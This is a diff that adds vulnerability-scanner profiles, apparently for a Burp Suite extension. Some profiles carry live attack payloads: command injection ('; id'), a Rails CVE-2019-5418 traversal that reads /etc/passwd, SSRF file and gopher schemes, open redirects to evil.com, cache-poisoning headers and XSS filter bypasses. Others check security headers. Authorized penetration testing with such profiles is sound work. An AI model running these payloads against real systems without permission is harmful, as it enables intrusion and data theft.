+[{"Name":"OAuth2response","Active":true,"Scanner":2,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["response_type","client_id","grant_type","redirect_uri","oauth","oidc"],"Tags":["JWT"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"OAuth2","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"OAuth2 Found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/OpenRedirect-ParameterPollution.bb b/profiles/OpenRedirect-ParameterPollution.bb
new file mode 100755
index 0000000..915b496
--- /dev/null
+++ b/profiles/OpenRedirect-ParameterPollution.bb
@@ -0,0 +1 @@
+[{"Name":"OpenRedirect-ParameterPollution","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["/{payload}","?next\u003d{payload}","?url\u003d{payload}","?target\u003d{payload}","?rurl\u003d{payload}","?dest\u003d{payload}","?destination\u003d{payload}","?redir\u003d{payload}","?redirect_uri\u003d{payload}","?redirect\u003d{payload}","/redirect/{payload}","/cgi-bin/redirect.cgi?{payload}","/out/{payload}","/out?{payload}","?view\u003d{payload}","/login?to\u003d{payload}","?image_url\u003d{payload}","?go\u003d{payload}","?return\u003d{payload}","?returnTo\u003d{payload}","?return_to\u003d{payload}","?checkout_url\u003d{payload}","?continue\u003d{payload}","?return_path\u003d{payload}"],"Encoder":[" "],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["-Token1337-"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":9,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"OpenRedirect-ParameterPollution","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Open Redirect with payload: \u003cbr\u003e\u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{payload}","replace":"http://www.wagiro.com/test-open-redirect","regex":"String","comment":"Generic comment"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/OpenRedirect.bb b/profiles/OpenRedirect.bb
new file mode 100755
index 0000000..9d16ebe
--- /dev/null
+++ b/profiles/OpenRedirect.bb
@@ -0,0 +1 @@
+[{"Name":"OpenRedirect","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["%2F%09%2Fevil.com","%2F%10%2Fevil.com","%2F%13%2Fevil.com","evil.com","/evil.com","//evil.com","///evil.com","////evil.com","/\\evil.com","%2fevil.com","%2f$2fevil.com","%2fevil.com%2f%2f","$2f%2fevil.com%2f%2f","%2fevil.com//","http://example.com%0a%23.evil.com"],"Encoder":[" "],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["location.*evil.com"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":2,"RedirType":4,"MaxRedir":9,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"OpenRedirect","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Open Redirect with payload: \u003cbr\u003e\u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/RCE.bb b/profiles/RCE.bb
new file mode 100755
index 0000000..d866483
--- /dev/null
+++ b/profiles/RCE.bb
@@ -0,0 +1 @@
+[{"Name":"RCE","Active":true,"Scanner":1,"Author":"@egarme","Payloads":[" || id"," | id","; id"," \u0026\u0026 id"," \u0026 id"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[".*uid\u003d.*gid\u003d.*groups\u003d.*"],"Tags":["RCE"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":2,"RedirType":4,"MaxRedir":4,"payloadPosition":2,"payloadsFile":"","grepsFile":"","IssueName":"RCE","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"RCE found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/Ruby on Rails CVE-2019-5418 WAF By.bb b/profiles/Ruby on Rails CVE-2019-5418 WAF By.bb
new file mode 100644
index 0000000..76b6328
--- /dev/null
+++ b/profiles/Ruby on Rails CVE-2019-5418 WAF By.bb
@@ -0,0 +1 @@
+[{"Name":"Ruby on Rails CVE-2019-5418 WAF By","Active":true,"Scanner":1,"Author":"egarme","Payloads":["/"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["root:x"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":3,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Ruby on Rails CVE-2019-5418","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Request","match":"Accept: .*","replace":"Accept: ../../../../../../../../e*c/p*ss*d{{","regex":"Regex","comment":"Generic comment"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/Ruby on Rails CVE-2019-5418-WAF-Bypass.bb b/profiles/Ruby on Rails CVE-2019-5418-WAF-Bypass.bb
new file mode 100755
index 0000000..b01ed96
--- /dev/null
+++ b/profiles/Ruby on Rails CVE-2019-5418-WAF-Bypass.bb
@@ -0,0 +1 @@
+[{"Name":"Ruby on Rails CVE-2019-5418 WAF Bypass","Active":true,"Scanner":1,"Author":"egarme","Payloads":["","/"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["root:x"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":3,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Ruby on Rails CVE-2019-5418","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Request","match":"Accept: .*","replace":"Accept: ../../../../../../../../e*c/p*ss*d{{","regex":"Regex","comment":"Generic comment"}],"VariationAttributes":[],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/Ruby on Rails CVE-2019-5418.bb b/profiles/Ruby on Rails CVE-2019-5418.bb
new file mode 100755
index 0000000..df3623c
--- /dev/null
+++ b/profiles/Ruby on Rails CVE-2019-5418.bb
@@ -0,0 +1 @@
+[{"Name":"Ruby on Rails CVE-2019-5418","Active":true,"Scanner":1,"Author":"egarme","Payloads":["/"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["root:x"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":3,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Ruby on Rails CVE-2019-5418","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Request","match":"Accept: .*","replace":"Accept: ../../../../../../../../etc/passwd{{","regex":"Regex","comment":"Generic comment"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/SSRF-Collaborator.bb b/profiles/SSRF-Collaborator.bb
new file mode 100755
index 0000000..c0e6b80
--- /dev/null
+++ b/profiles/SSRF-Collaborator.bb
@@ -0,0 +1 @@
+[{"Name":"SSRF-Collaborator","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["http://{BC}","dict://{BC}","sftp://{BC}","ldap://{BC}","gopher://{BC}"],"Encoder":[" "],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["Collaborator"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":9,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"SSRF-Collaborator","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"SSRF with payload: \u003cbr\u003e\u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/SSRF-URLScheme.bb b/profiles/SSRF-URLScheme.bb
new file mode 100755
index 0000000..7bb5c0f
--- /dev/null
+++ b/profiles/SSRF-URLScheme.bb
@@ -0,0 +1 @@
+[{"Name":"SSRF-URLScheme","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["file:///etc/passwd","file://\\/\\/etc/passwd"],"Encoder":[" "],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["root:x"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":9,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"SSRF-URLScheme","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"SSRF-URLScheme with payload: \u003cbr\u003e\u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/ServerBanner.bb b/profiles/ServerBanner.bb
new file mode 100755
index 0000000..9166453
--- /dev/null
+++ b/profiles/ServerBanner.bb
@@ -0,0 +1 @@
+[{"Name":"ServerBanner","Active":true,"Scanner":2,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Server:.*[0-9].*"],"Tags":["regex"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"ServerBanner","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Server banner found: \u003cbr\u003e\u003cgrep\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/Strict-Transport-Security.bb b/profiles/Strict-Transport-Security.bb
new file mode 100755
index 0000000..ed528af
--- /dev/null
+++ b/profiles/Strict-Transport-Security.bb
@@ -0,0 +1 @@
+[{"Name":"Strict-Transport-Security","Active":true,"Scanner":2,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["Strict-Transport-Security"],"Tags":["SecurityHeaders"],"PayloadResponse":false,"NotResponse":true,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Strict-Transport-Security","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Security Header \"Strict-Transport-Security\" not present in response.","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/Swagger-Finder.bb b/profiles/Swagger-Finder.bb
new file mode 100755
index 0000000..caff46a
--- /dev/null
+++ b/profiles/Swagger-Finder.bb
@@ -0,0 +1 @@
+[{"Name":"Swagger-Finder","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["/swagger-ui.html","/swagger/swagger-ui.html","/api/swagger-ui.html","/swagger/index.html","/v1.0/swagger-ui.html","/v2.0/swagger-ui.html","/v3.0/swagger-ui.html"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["id\u003d\"swagger"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":5,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Swagger-Finder","IssueSeverity":"Low","IssueConfidence":"Firm","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[65],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/WebCachePoisoning.bb b/profiles/WebCachePoisoning.bb
new file mode 100755
index 0000000..22f0a83
--- /dev/null
+++ b/profiles/WebCachePoisoning.bb
@@ -0,0 +1 @@
+[{"Name":"WebCachePoisoning","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["STRINGFORREQUEST"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["TOKEN1337"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":3,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Web-Cache-Poisoning","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"Web Cache poisoning with payload: \u003cbr\u003e\u003cpayload\u003e\n\n\u003cbr\u003e\u003cbr\u003eBy James Kettle:\u003cbr\u003ehttps://portswigger.net/blog/practical-web-cache-poisoning","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Request","match":"","replace":"X-Forwarded-For: TOKEN1337","regex":"String","comment":"Add X-Forwarded-For header with payload xss."},{"type":"Request","match":"","replace":"X-Host: TOKEN1337","regex":"String","comment":"Generic comment"},{"type":"Request","match":"","replace":"X-Forwarded-Server: TOKEN1337","regex":"String","comment":"Generic comment"},{"type":"Request","match":"","replace":"X-Forwarded-Scheme: TOKEN1337","regex":"String","comment":"Generic comment"},{"type":"Request","match":"","replace":"X-Original-URL: TOKEN1337","regex":"String","comment":"Generic comment"},{"type":"Request","match":"","replace":"X-Rewrite-URL: TOKEN1337","regex":"String","comment":"Generic comment"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/WeblogicServer-UDDI Explorer.bb b/profiles/WeblogicServer-UDDI Explorer.bb
new file mode 100755
index 0000000..66bca95
--- /dev/null
+++ b/profiles/WeblogicServer-UDDI Explorer.bb
@@ -0,0 +1 @@
+[{"Name":"WeblogicServer-UDDI Explorer","Active":true,"Scanner":3,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["/uddiexplorer/searchpublicregistries.jsp"],"Tags":[],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"WeblogicServer-UDDI Explorer","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"https://www.exploit-db.com/ghdb/4991","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/Wordpress-SensitiveDirectories.bb b/profiles/Wordpress-SensitiveDirectories.bb
new file mode 100755
index 0000000..a2f79a1
--- /dev/null
+++ b/profiles/Wordpress-SensitiveDirectories.bb
@@ -0,0 +1 @@
+[{"Name":"Wordpress-SensitiveDirectories","Active":true,"Scanner":2,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["/wp-content/uploads/wp-backup-plus/"],"Tags":["CMS"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Wordpress-SensitiveDirectories","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Wordpress Sensitive Directories:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/5032/","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/X-Content-Type-Options.bb b/profiles/X-Content-Type-Options.bb
new file mode 100755
index 0000000..d8401a1
--- /dev/null
+++ b/profiles/X-Content-Type-Options.bb
@@ -0,0 +1 @@
+[{"Name":"X-Content-Type-Options","Active":true,"Scanner":2,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["X-Content-Type-Options: nosniff"],"Tags":["SecurityHeaders"],"PayloadResponse":false,"NotResponse":true,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"X-Content-Type-Options","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Security Header \"X-Content-Type-Options\" not present in response.","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/X-Frame-Options.bb b/profiles/X-Frame-Options.bb
new file mode 100755
index 0000000..31c5e4e
--- /dev/null
+++ b/profiles/X-Frame-Options.bb
@@ -0,0 +1 @@
+[{"Name":"X-Frame-Options","Active":true,"Scanner":2,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["X-Frame-Options"],"Tags":["SecurityHeaders"],"PayloadResponse":false,"NotResponse":true,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"X-Frame-Options","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Security Header \"X-Frame-Options\" not present in response.","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/X-Headers-Collaborator.bb b/profiles/X-Headers-Collaborator.bb
new file mode 100755
index 0000000..96f40cf
--- /dev/null
+++ b/profiles/X-Headers-Collaborator.bb
@@ -0,0 +1 @@
+[{"Name":"X-Headers-Collaborator","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["http://{BC}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["Collaborator"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":1,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"X-Headers-Collaborator","IssueSeverity":"High","IssueConfidence":"Certain","IssueDetail":"X-Headers-Collaborator","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Request","match":"","replace":"X-Forwarded-For: {PAYLOAD}","regex":"String","comment":"Add X-Forwarded-For header with payload."},{"type":"Request","match":"","replace":"X-Host: {PAYLOAD}","regex":"String","comment":"X-Host"},{"type":"Request","match":"","replace":"X-Forwarded-Server: {PAYLOAD}","regex":"String","comment":"X-Forwarded-Server "},{"type":"Request","match":"","replace":"X-Forwarded-Scheme: {PAYLOAD}","regex":"String","comment":"X-Forwarded-Scheme"},{"type":"Request","match":"","replace":"X-Original-URL: {PAYLOAD}","regex":"String","comment":"X-Original-URL"},{"type":"Request","match":"","replace":"X-Rewrite-URL: {PAYLOAD}","regex":"String","comment":"X-Rewrite-URL"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/X-XSS-Protection.bb b/profiles/X-XSS-Protection.bb
new file mode 100755
index 0000000..0629c8c
--- /dev/null
+++ b/profiles/X-XSS-Protection.bb
@@ -0,0 +1 @@
+[{"Name":"X-XSS-Protection","Active":true,"Scanner":2,"Author":"@egarme","Payloads":[],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["X-XSS-Protection: 1;"],"Tags":["SecurityHeaders"],"PayloadResponse":false,"NotResponse":true,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"X-XSS-Protection","IssueSeverity":"Information","IssueConfidence":"Firm","IssueDetail":"Security Header \"X-XSS-Protection\" not present in response.","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/XSS - Akamai GHost bypass.bb b/profiles/XSS - Akamai GHost bypass.bb
new file mode 100755
index 0000000..fbcc321
--- /dev/null
+++ b/profiles/XSS - Akamai GHost bypass.bb
@@ -0,0 +1 @@
+[{"Name":"XSS - Akamai GHost bypass","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["\u003cdETAILS%0aopen%0aonToGgle%0a\u003d%0aa\u003dprompt,a()x\u003e"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["\u003cdETAILS"],"Tags":["XSS"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":true,"OnlyHTTP":false,"IsContentType":false,"ContentType":"text/plain","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":1,"RedirType":4,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"XSS - Akamai GHost bypass","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/XSS.bb b/profiles/XSS.bb
new file mode 100755
index 0000000..3e324c4
--- /dev/null
+++ b/profiles/XSS.bb
@@ -0,0 +1 @@
+[{"Name":"XSS","Active":true,"Scanner":1,"Author":"@egarme","Payloads":["\u003c/script\u003e\u003cscript\u003econfirm(1)\u003c/script\u003e","\"\u003e\u003cimg src\u003dx onerror\u003dprompt(1);\u003e.","\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e","\u003csvg oNLoAd\u003dalert(\u0027XSS\u0027)\u003e","\u003csvg/oNLoAd\u003dalert(1)\u003e","\"\u003e\u003cSCRIPT\u003ea\u003d/XSS/.alert(a.source)\u003c/SCRIPT\u003e\u003c!--","\u003csvg\u003e\u003cscript\u003ealert\u0026#40/1/.source\u0026#41\u003c/script\u003e\u003c/svg\u003e","javascript:/*--\u003e\u003c/title\u003e\u003c/style\u003e\u003c/textarea\u003e\u003c/script\u003e\u003c/xmp\u003e\u003csvg/onload\u003d\u0027+/\"/+/onmouseover\u003d1/+/[*/[]/+alert(11)//\u0027\u003e","\u003cmarquee loop\u003d1 width\u003d0 onfinish\u003dalert(2)\u003e"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":[],"Tags":["XSS"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":true,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/plain, application/json","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"MatchType":3,"RedirType":4,"MaxRedir":5,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"XSS","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"XSS with payloads: \u003cpayload\u003e","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"pathDiscovery":false}]
\ No newline at end of file
diff --git a/profiles/XSSHtmlUrlEncode.bb b/profiles/XSSHtmlUrlEncode.bb
new file mode 100755
index 0000000..0f519d1
--- /dev/null
+++ b/profiles/XSSHtmlUrlEncode.bb
@@ -0,0 +1 @@
